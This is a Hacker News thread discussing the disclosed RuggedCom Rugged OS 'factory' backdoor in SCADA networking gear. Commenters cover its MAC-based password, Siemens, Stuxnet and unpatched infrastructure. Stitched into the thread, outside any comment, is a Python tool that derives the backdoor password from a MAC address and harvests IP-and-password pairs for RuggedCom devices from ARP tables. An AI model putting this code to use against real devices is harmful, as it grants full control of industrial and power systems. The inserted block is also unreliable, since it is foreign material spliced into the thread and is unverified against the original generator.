
Rugged OS (industry, military & power plant OS) has backdoor into SCADA networks - fpp
http://seclists.org/fulldisclosure/2012/Apr/277
======
matthavener
Every RuggedCom device starts with 00-0A-DC
(<http://www.coffer.com/mac_find/?string=ruggedcom>). Even without the MAC,
you really only have to search 2^24 possible passwords. And that's assuming
they randomize their mac allocations.

~~~
0x0
And since the MAC address is visible in the ARP table and on the ethernet, if
you're simply able to TCP connect, the MAC address is already given!

------
fpp
What is most disturbing is that they have known about this for a year now and
have still not acted on it - even with all the press around Stuxnet.

BTW - RuggedCom was recently sold to Siemens for C$382 million - hope they
have informed them about this issue, otherwise I guess it will soon be lawyer
time.

~~~
lawnchair_larry
No worries. Siemens backdoors are even worse.

~~~
drucken
Indeed. Siemens vulnerabilities are precisely how Stuxnet worked.

------
kiba
The best way to compromise national security is to have backdoors in the name
of national security.

~~~
gvb
The backdoor has national, international, and local security _implications._
The user name is "factory" and the password is based on the unit's MAC
address. That pretty strongly indicates it was intended for factory
initialization and recovery of mis-configured devices, not a backdoor in the
name of "national security".

"Factory" user/password combinations have long been a problem - often not
revealed to the purchaser of the equipment[1][2]. This one is especially bad
because it cannot be disabled even if the user knows about it.

[1] <http://all.net/CID/Attack/papers/BadDefaults.html>

[2] Oracle is notorious for default users/passwords
<http://www.petefinnigan.com/default/default_password_list.htm>

------
swdunlop
This is a common problem in industrial firmware; Allen Bradley PLCs and
frequency drives had a well-known backdoor for years prior to the Rockwell
acquisition. (And for some time after, since AB can't retire an old product.)

------
lifeisstillgood
So, now that this is out, what do the admins for these compromisable systems
do? Presumably RuggedCom has not got a patch out yet, so they just sit there?

Not a good day.

~~~
elithrar
> So, now that this is out, what do the admins for these compromisable
> systems do? Presumably RuggedCom has not got a patch out yet, so they just
> sit there?

There are often no "admins" of these systems. They are installed, the support
contract lapses, and they continue to run—vulnerabilities and all. Sometimes
there may have been an air-gap, but a desire for remote management results in
a 'net link being connected. A VPN or firewall is typically the only security
in-place.

The systems often run beyond what we in IT would call a sensible shelf life,
because they're the control system for a major plant or piece of
infrastructure. Shutting them down to do the upgrade bears a cost of its own
(note that I am not condoning this behaviour).

It's disappointing, and dangerous, but hopefully as we move to more
generalised hardware and IEC 61850/IP (over Modbus, DNP3, etc.) solutions,
things will improve. I think some organisations are running a race they're
destined to lose though, especially as intruders set their sights on these
weaknesses.

~~~
lifeisstillgood
Not so long ago botnets were used to blackmail sites into paying DDoS
"protection". If you knew enough to command a piece of plant to exceed its
design parameters you could blackmail quite effectively. Stuxnet, but for
profit.

~~~
tripzilch
This is what I love about HN, always looking to turn a bad situation into a
profitable startup!

------
K2h
The exploit demo is written in Perl. Finally, something I can read and
understand.

~~~
rdark
Surprised no-one from the Perl community has complained about the lack of 'use
strict' in this 15 liner..

------
fromhet
What permissions does "factory" have in their systems then?

~~~
fpp
complete administrative control of the device

"...An attacker with knowledge of an ROS device's MAC address may be able to
gain complete administrative control of the device..."

see: <http://www.kb.cert.org/vuls/id/889195>

------
trout
What's interesting is the NERC CIP push from the federal side to get power
distribution devices onto a common IP network. I'm a bit fuzzy on the details,
but there are major incentives and/or regulations for doing this, and it's a
pretty important inflection point for the technology used in power companies.
Even then, there are only a handful of companies playing in that space
(RuggedCom, Siemens, Cisco, some other traditional manufacturing PLC folks).

From my experience most of these devices are read-only monitors, but I'm sure
there are exceptions. This little issue could be a big deal for their
certification. I'm surprised they didn't take it more seriously. This is the
hackers-will-take-over-our-power-grid kind of scenario the public doesn't like
to think about.

------
bifrost
Basically, this is instant access to any control system out there. MAC address
can be had trivially. The researcher who did this did this with minimal
resources. Guess what a foreign government/agitator will do?

------
bootz15
Curious how the password generator got leaked... an insider?

~~~
shabble
The algorithm looks pretty trivial. All it does is take the mac address,
reverse the byte ordering, and use the result modulo 999999929.

That's probably simple enough that even I could read it in assembly and figure
it out. I don't know if getting a firmware image is difficult, but the actual
generator certainly isn't the hard part here.

I'm wondering if that modulo value has any meaning - looking at it in a few
different formats hasn't immediately struck any sparks with me.

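As an added worked example (not code from the disclosure, from this thread or
from RuggedCom, and in Python rather than the PoC's Perl), here is the
derivation shabble describes just above, together with the check that the
earlier comments by matthavener and 0x0 imply: pull every MAC in RuggedCom's
00-0A-DC OUI out of an ARP table and compute the "factory" password for it. It
assumes the comment's description is exact (reverse the byte order of the MAC,
read it as a 48-bit integer, reduce modulo 999999929); that has not been
verified against the original generator. The ARP rows, IPs and MACs below are
constructed.

```python
import re

# Constants taken from the thread: RuggedCom's OUI (00-0A-DC) and the
# modulus shabble read out of the password generator.
RUGGEDCOM_OUI = bytes.fromhex("000adc")
MODULUS = 999999929

_HEX12 = re.compile(r"^[0-9a-fA-F]{12}$")
_IP_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
_MAC_RE = re.compile(r"\b([0-9a-fA-F]{2}(?:[:-][0-9a-fA-F]{2}){5})\b")


def parse_mac(text: str) -> bytes:
    """Accept 00:0A:DC:01:02:03, 00-0a-dc-01-02-03, 000a.dc01.0203 or
    000adc010203 and return the six raw bytes; reject anything else."""
    digits = re.sub(r"[:.\-]", "", text.strip())
    if not _HEX12.match(digits):
        raise ValueError(f"not a MAC address: {text!r}")
    return bytes.fromhex(digits)


def factory_password(mac: str) -> int:
    """Derive the 'factory' password as the thread describes it: reverse
    the six bytes, read them as one 48-bit big-endian integer, reduce
    modulo 999999929.
    ASSUMPTION: this follows the comment's description, not the vendor's
    generator or the original PoC.  Because the OUI is fixed for every
    RuggedCom unit, only the low 24 bits of the MAC vary, so an attacker
    who cannot see the MAC still has at most 2**24 candidates to try."""
    raw = parse_mac(mac)
    value = int.from_bytes(raw[::-1], "big")
    return value % MODULUS


def ruggedcom_candidates(arp_output: str) -> dict[str, int]:
    """Scan `arp -a`-style text for MACs in RuggedCom's OUI and return
    {ip: factory password}.  Rows from other vendors are skipped.  This is
    the check a defender can run against their own ARP table: every entry
    it returns is a device that anyone on the segment can log into."""
    found = {}
    for line in arp_output.splitlines():
        ip = _IP_RE.search(line)
        mac = _MAC_RE.search(line)
        if not (ip and mac):
            continue
        raw = parse_mac(mac.group(1))
        if raw[:3] == RUGGEDCOM_OUI:
            found[ip.group(1)] = factory_password(mac.group(1))
    return found


# Constructed sample ARP output (not captured from a real network).
SAMPLE_ARP = """\
? (10.1.5.2) at 00:0a:dc:01:02:03 [ether] on eth0
? (10.1.5.9) at 00:1b:21:aa:bb:cc [ether] on eth0
? (10.1.5.40) at 00-0A-DC-12-34-56 [ether] on eth0
"""

if __name__ == "__main__":
    for ip, pw in ruggedcom_candidates(SAMPLE_ARP).items():
        print(f"{ip}: factory / {pw}")
```

Feed it the output of `arp -a` (or a switch's MAC table export) instead of
SAMPLE_ARP to inventory exposed units; the password column is exactly what the
thread says an attacker already has once they can see the MAC.
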
~~~
excuse-me
That's the sort of password an idiot would have on their luggage .......

Downvote? People don't watch the classics anymore!

~~~
Tomis02
You're on a forum full of self-important humourless people, what did you
expect? Mind the downvotes.

------
stef25
So you don't need Stuxnet anymore?

